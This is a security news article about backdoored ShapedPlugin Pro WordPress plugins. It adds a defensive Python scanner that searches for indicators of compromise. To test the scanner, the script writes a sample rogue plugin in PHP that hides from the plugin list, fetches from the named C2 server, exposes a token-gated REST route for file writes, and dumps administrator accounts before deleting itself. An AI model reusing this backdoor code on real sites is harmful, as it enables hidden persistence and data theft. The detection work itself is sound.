ShapedPlugin WordPress Pro Plugins Compromised in Supply Chain Attack

Several Pro WordPress plugins from ShapedPlugin were compromised in a supply chain attack after unknown actors managed to breach the vendor's legitimate distribution channel and push backdoored code to paying customers.
“The attackers compromised the build and distribution pipeline of the seller, injecting backend code into the Pro plugin release that is distributed through officially licensed update channels,” Wordfence said in an analysis published last week.
The incident affects the following Pro plugins –
- Product Slider Pro for WooCommerce (versions before 3.5.4)
- Real Testimonials Pro (version 3.2.5)
- Smart Post Show Pro (versions before 4.0.2)
It should be emphasized that the compromise affects only the Pro plugin builds distributed through the vendor's Easy Digital Downloads (EDD) infrastructure at account.shapedplugin[.]com. The free versions of the plugins hosted on WordPress.org are not affected.
The supply chain compromise of Product Slider Pro for WooCommerce has been assigned the CVE identifier CVE-2026-49777 with a CVSS score of 10.0, indicating critical severity. CVE-2026-10735 (CVSS score: 9.8) has been assigned to the incident as a whole.
The WordPress security company said the compromised plugin versions include a loader that runs on every admin page load, downloads a payload from a remote server (194.76.217[.]28:2871), installs it, and executes it as a rogue plugin.
Once activated, the malware reports the victim's domain back to the server and deletes itself to cover its tracks and complicate incident response. The rogue plugin, for its part, hides itself from the WordPress plugin admin page and is capable of harvesting plaintext credentials and two-factor authentication (2FA) codes.
It also sets up multiple persistence mechanisms, including a custom REST endpoint that permits arbitrary file writes when presented with a specific authentication token, as well as a web shell with command execution capabilities. Finally, a PHP file named "install-persistent.php," bundled with the plugin, is used to exfiltrate the following data –
- The complete contents of wp-config.php, including database credentials, authentication keys, and debugging settings
- All administrator accounts along with their registration dates
- Mail plugin credentials from WP Mail SMTP, Send SMTP, and Easy WP SMTP
- WooCommerce order data from the last three months, including payment method
Once this information has been output, the file deletes itself. The evidence suggests the attack was a compromise of the vendor's build pipeline rather than direct tampering with the packages.
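The behaviour described above gives a defender a few concrete things to look for on disk. The script below is an added example, not code from Wordfence or ShapedPlugin: it sweeps a directory tree for the two indicators the write-up names (the payload server and the bundled install-persistent.php) and adds my own heuristics for the described behaviours (hiding from the plugin list, a REST route that writes files, self-deletion, and a remote fetch from an admin hook). The sample wp-content tree it builds, including the rogue plugin name wp-core-helper, is constructed for illustration only.

```python
"""Post-compromise IoC sweep for a WordPress tree (added example).

Point scan_tree() at wp-content/ of a site that pulled a Pro update through
the vendor's EDD channel. Indicators come from the write-up; the heuristics
are my own assumptions about how the described behaviour is usually coded.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Indicators from the write-up (defanging removed so they match on disk).
C2_HOST = "194.76.217.28"
C2_PORT = "2871"
EXFIL_FILE = "install-persistent.php"

# Heuristics (assumptions, not Wordfence signatures): legitimate plugins can
# trip these too, so treat hits as triage leads rather than verdicts.
HEURISTICS = {
    "hides_from_plugin_list": re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),
    "rest_route_with_file_write": re.compile(
        r"register_rest_route\(.*?file_put_contents\(", re.S),
    "self_deletes": re.compile(r"unlink\(\s*__FILE__\s*\)"),
    "remote_fetch_on_admin_hook": re.compile(
        r"add_action\(\s*['\"]admin_(?:init|head|footer)['\"].*?"
        r"(?:wp_remote_get|file_get_contents\(\s*['\"]https?://)", re.S),
}


@dataclass(frozen=True)
class Finding:
    path: str
    kind: str
    evidence: str


def scan_file(path: str) -> list[Finding]:
    """Return every indicator or heuristic hit for one PHP file."""
    findings = []
    if os.path.basename(path) == EXFIL_FILE:
        findings.append(Finding(path, "exfil_script", EXFIL_FILE))
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    except OSError:
        return findings
    # Match the host alone or with the port the write-up reports.
    for m in re.finditer(re.escape(C2_HOST) + r"(?::" + C2_PORT + r")?", text):
        findings.append(Finding(path, "c2_reference", m.group(0)))
    for kind, pattern in HEURISTICS.items():
        m = pattern.search(text)
        if m:
            findings.append(Finding(path, kind, m.group(0)[:60].replace("\n", " ")))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Walk a directory and scan every .php file under it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def build_sample_site() -> str:
    """Constructed wp-content tree: one clean plugin and one rogue plugin.

    The rogue plugin only mirrors the behaviours described in the write-up;
    its name, token and paths are hypothetical.
    """
    root = tempfile.mkdtemp(prefix="wp-content-")
    clean = os.path.join(root, "plugins", "clean-plugin")
    rogue = os.path.join(root, "plugins", "wp-core-helper")
    os.makedirs(clean)
    os.makedirs(rogue)
    with open(os.path.join(clean, "clean-plugin.php"), "w") as fh:
        fh.write("<?php\n/* Plugin Name: Clean Plugin */\nadd_action('init', 'cp_init');\n")
    with open(os.path.join(rogue, "wp-core-helper.php"), "w") as fh:
        fh.write(
            "<?php\n/* Plugin Name: Core Helper */\n"
            "add_filter('all_plugins', function($p) { unset($p['wp-core-helper/wp-core-helper.php']); return $p; });\n"
            "add_action('admin_init', function() { $r = wp_remote_get('http://194.76.217.28:2871/p'); });\n"
            "register_rest_route('helper/v1', '/w', array('callback' => function($req) {\n"
            "  if ($req['token'] !== 'PLACEHOLDER') { return; }\n"
            "  file_put_contents($req['path'], $req['data']); }));\n"
        )
    with open(os.path.join(rogue, EXFIL_FILE), "w") as fh:
        fh.write("<?php\necho json_encode(get_users(array('role' => 'administrator')));\nunlink(__FILE__);\n")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for f in scan_tree(site):
        print(f"{f.kind:28} {os.path.relpath(f.path, site)}  {f.evidence}")
```

Because both the loader and install-persistent.php delete themselves, a clean sweep of the current tree does not prove a site was never compromised; a Pro update pulled from the vendor's channel in the affected version range should be treated as a compromise regardless, and the credential rotation steps at the end of this article still apply.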
What makes the attack particularly dangerous is that it exposed site owners who had purchased legitimate licenses and installed updates through the vendor's official update mechanism to the malware.
After being notified of the issue, ShapedPlugin confirmed the incident and said it is reviewing its distribution and release processes to ensure the integrity of its products going forward. Clean versions of the affected plugins are expected to be released once full security reviews and validation testing are complete.
Site owners who installed the malicious versions are advised to reset all passwords, revoke and regenerate 2FA secrets for all users, review administrator accounts for unauthorized additions, and check mail plugin settings for modified SMTP credentials. Given that the full contents of wp-config.php were also exfiltrated, rotating the database credentials and the authentication keys and salts defined in that file is prudent as well.